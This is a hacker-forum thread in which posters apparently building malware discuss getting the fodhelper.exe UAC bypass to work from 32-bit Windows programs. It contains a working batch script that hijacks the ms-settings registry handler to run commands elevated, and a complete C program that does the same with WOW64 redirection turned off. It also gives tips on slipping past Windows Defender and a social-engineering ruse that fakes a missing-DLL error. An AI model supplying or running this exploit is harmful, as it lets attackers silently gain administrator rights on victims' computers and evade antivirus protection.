
Problem with UAC Bypass

n0kkster

Hi everyone, respected folks! I'm implementing the most hackneyed UAC bypass method, via fodhelper.exe, in C, but the problem is that however I try to launch fodhelper from an x32 build, the program just doesn't see it, no matter what. I tried CreateProcess, ShellExecuteEx, even the damn system(*path to fodhelper*), nothing helped. On x64 everything works perfectly. I don't understand which direction to dig in to figure out why this problem occurs specifically on x32. If I launch, say, calc.exe the same way, it works just fine.
C:
        // The poster's API(module, name) macro resolves the import at run time; kept as-is.
        SHELLEXECUTEINFOW shellinfo = {0};   // zero the whole struct: fields not set below (lpClass, hkeyClass, hProcess, ...) must be 0
        shellinfo.cbSize = sizeof(SHELLEXECUTEINFOW);
        shellinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        shellinfo.hwnd = 0;
        shellinfo.lpVerb = L"open";
        // From a 32-bit process on x64 this path is redirected to SysWOW64, where fodhelper.exe does not exist
        shellinfo.lpFile = L"C:\\Windows\\System32\\fodhelper.exe";
        shellinfo.lpParameters = 0;
        shellinfo.lpDirectory = 0;
        shellinfo.nShow = 0;                 // SW_HIDE
        shellinfo.hInstApp = 0;
        if (API(SHELL32, ShellExecuteExW)(&shellinfo))
        {
            wprintf(L"Created process successfully through ShellExecuteEx\n");
            API(KERNEL32, ExitProcess)(0);
        }
        else
            Exit(L"error while creating process");
 
I don't recommend implementing this in your malware. It was used in TrickBot, which will get your payload detected within hours if not minutes.

Instead, prompt the user to accept the UAC prompt with social engineering within the app.
Example: Can't find ....dll, please run as admin
 
UAC LPE (my version):

Requirements:
- Windows 10 (any build, tested on 21H2).
- UAC level (User Account Control) below the highest. Default on all OS versions: medium.

What it does:
Elevates from a limited administrator to a full one. You can check with the command:
whoami.exe /priv

AV protection:
Antiviruses flag it, but with, for example, the default Windows Defender the payload manages to run before it gets blocked.

Batch file code:

rem The command that fodhelper.exe will run elevated, via the hijacked ms-settings handler
set cmd=cmd.exe /k
rem An empty DelegateExecute value makes the shell fall back to the key's default value as the command
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /d "" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /f /d "%cmd%"
rem fodhelper.exe auto-elevates and launches the handler it finds under HKCU
"%SystemRoot%\System32\fodhelper.exe"
rem Give fodhelper a second to read the key before it is removed
TIMEOUT /T 1
reg delete "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f
 
First, this exploit is very old and detected. Second, if your application.exe is x86 and the system is x64, then you will face a problem and can't exploit it.
What you need to do is use x64 for x64 and x86 for x86. You can exploit this by manipulating the registry; then you can use cmd to execute fodhelper and exit your main.exe, and fodhelper will launch your application.exe as administrator.
 
No detections at runtime or scan time, at least from WinDef :) Btw, you CAN use this trick if your x86 application is running under an x64 system.
 
When you are targeting random people you can't assume what AV they use, so if WD doesn't detect it, Kaspersky will, and then it will share the signature with the other AV companies and it will be detected by all of them. The reason I am saying this is that there are new Windows 10 LPE exploits that are not detected, at least for now.

And about the x86 application trick: it's not a trick. If you run an x86 application under an x64 system and you run cmd or fodhelper, it will search in SysWOW64, not in the system path, so that will not work. I tested this in the past, like in 2020 or 2019, can't remember.
 
I know about redirection, but there is a great WinAPI call, Wow64DisableWow64FsRedirection, that tells your app to find fodhelper in the right folder. About detections, it's probably detected by other AVs; anyway, I'm not using this in ready-to-use malware, this sample is for my personal use.
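The redirection problem from the opening post and the registry-key procedure from the batch post, as one added example in C that is not code from the thread. It assumes the default UAC level the batch post names, the HKCU\Software\Classes\ms-settings\Shell\Open\command path from that post, and that fodhelper.exe has no SysWOW64 copy (calc.exe does have one, which is why calc worked for the poster). The first part is a portable model of WOW64 file-system redirection so the symptom can be checked anywhere; the Windows part (compiled only under _WIN32; link with advapi32 on MinGW) sets the hijack key, disables redirection around CreateProcessW as the reply above suggests, reverts it, and removes the key. Function and variable names, and the `cmd.exe /k whoami /priv` payload, are the example's own.

```c
/* Added example, not code from the thread: fodhelper UAC bypass in C that
 * also works from a 32-bit (WOW64) build on x64. Names are the example's own. */
#define _WIN32_WINNT 0x0600            /* for Wow64*FsRedirection / RegDeleteTreeW */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Portable model of WOW64 file-system redirection (common case only; the
 * documented exceptions such as System32\catroot are ignored). A 32-bit
 * process that opens System32\X silently gets SysWOW64\X; Sysnative is a
 * virtual alias, visible only to WOW64 processes, for the real System32.
 * calc.exe has a SysWOW64 copy, fodhelper.exe does not: hence the symptom. */
static int starts_with_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Path the OS actually opens for `path` from a process in the given state. */
const char *wow64_resolve(const char *path, int is_wow64, int redir_disabled,
                          char *out, size_t outlen)
{
    static const char sys32[] = "C:\\Windows\\System32\\";
    static const char sysnative[] = "C:\\Windows\\Sysnative\\";
    if (is_wow64 && starts_with_ci(path, sysnative))
        snprintf(out, outlen, "%s%s", sys32, path + strlen(sysnative));
    else if (is_wow64 && !redir_disabled && starts_with_ci(path, sys32))
        snprintf(out, outlen, "C:\\Windows\\SysWOW64\\%s", path + strlen(sys32));
    else
        snprintf(out, outlen, "%s", path);  /* native 64-bit process, or redirection off */
    return out;
}

/* Convenience check: does `path` resolve to `expected` in the given state? */
int resolves_to(const char *path, int is_wow64, int redir_disabled, const char *expected)
{
    char buf[512];
    return strcmp(wow64_resolve(path, is_wow64, redir_disabled, buf, sizeof buf), expected) == 0;
}

#ifdef _WIN32
#include <windows.h>
#define HIJACK_KEY L"Software\\Classes\\ms-settings\\Shell\\Open\\command"

/* Same registry setup as the batch post: empty DelegateExecute + default value = command. */
static LONG set_hijack_key(const wchar_t *cmd)
{
    HKEY hk;
    LONG rc = RegCreateKeyExW(HKEY_CURRENT_USER, HIJACK_KEY, 0, NULL, 0,
                              KEY_WRITE, NULL, &hk, NULL);
    if (rc != ERROR_SUCCESS) return rc;
    rc = RegSetValueExW(hk, L"DelegateExecute", 0, REG_SZ, (const BYTE *)L"", sizeof(wchar_t));
    if (rc == ERROR_SUCCESS)
        rc = RegSetValueExW(hk, NULL, 0, REG_SZ, (const BYTE *)cmd,
                            (DWORD)((wcslen(cmd) + 1) * sizeof(wchar_t)));
    RegCloseKey(hk);
    return rc;
}

static BOOL launch_fodhelper(void)
{
    wchar_t path[MAX_PATH];
    STARTUPINFOW si = { sizeof si };         /* fully zeroed; OP's SHELLEXECUTEINFOW was not */
    PROCESS_INFORMATION pi = { 0 };
    PVOID old_state = NULL;
    BOOL wow = FALSE, disabled, ok;
    UINT len;
    IsWow64Process(GetCurrentProcess(), &wow);
    /* The fix from the thread: turn redirection off for this thread only,
     * start the real System32\fodhelper.exe, then restore it right away. */
    disabled = wow && Wow64DisableWow64FsRedirection(&old_state);
    len = GetSystemDirectoryW(path, MAX_PATH);        /* C:\Windows\system32 */
    if (len == 0 || len + 15 >= MAX_PATH) return FALSE;
    wcscat(path, L"\\fodhelper.exe");
    ok = CreateProcessW(path, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    if (disabled) Wow64RevertWow64FsRedirection(old_state);
    if (ok) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }
    return ok;
}
#endif

int main(void)
{
    char buf[512];
    int ok = 1;
    printf("32-bit build opening System32\\fodhelper.exe really opens: %s\n",
           wow64_resolve("C:\\Windows\\System32\\fodhelper.exe", 1, 0, buf, sizeof buf));
#ifdef _WIN32
    if (set_hijack_key(L"cmd.exe /k whoami /priv") != ERROR_SUCCESS) return 1;
    ok = launch_fodhelper();
    Sleep(2000);   /* like TIMEOUT /T 1 in the batch: let fodhelper read the key first */
    RegDeleteTreeW(HKEY_CURRENT_USER, L"Software\\Classes\\ms-settings"); /* remove the tree we created */
#endif
    return ok ? 0 : 1;
}
```

Build it once as 32-bit and once as 64-bit and run both on an x64 box: the 32-bit build now finds fodhelper.exe because redirection is off for the calling thread during CreateProcessW. The alternative that needs no API call is to open `%windir%\Sysnative\fodhelper.exe` from the 32-bit build, as the model above shows. Unlike the batch, the cleanup here deletes the whole ms-settings tree the example created rather than only the command key. At the "Always notify" UAC level fodhelper is not auto-elevated and a prompt appears instead, which is the requirement the batch post states.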
 
Thank you for explaining, I learned a new thing.
 

